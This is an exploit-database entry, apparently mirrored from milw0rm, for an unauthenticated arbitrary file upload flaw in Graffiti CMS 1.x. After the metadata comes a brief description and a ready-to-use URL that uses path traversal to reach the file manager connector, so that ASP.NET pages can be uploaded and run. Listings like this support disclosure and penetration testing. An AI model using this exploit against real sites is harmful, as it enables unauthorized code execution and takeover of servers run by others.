[] NeoSense
E X P L O I T S
title author type platform port cve id

Graffiti CMS 1.x - Arbitrary File Upload

Author: Alexander Concha
type: webapps
platform: php
port: 
date_added: 2009-09-09 
date_updated:  
verified: 1 
codes: OSVDB-58101 
tags: 
aliases:  
screenshot_url:  
application_url: 
Graffiti CMS includes a file manager component that allows
unauthenticated users to upload files (including asp.net pages which
allow code execution). All versions are affected by this
vulnerability.

To exploit this issue, it only suffices to access to the following URL.

http://DOMAIN_TLD/GRAFFITI_CMS_INSTALL_DIR/__utility/Telligent_Editor/editor/filemanager/browser/default/browser.html?connector=../../connectors/aspx/connector.aspx

# milw0rm.com [2009-09-10]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.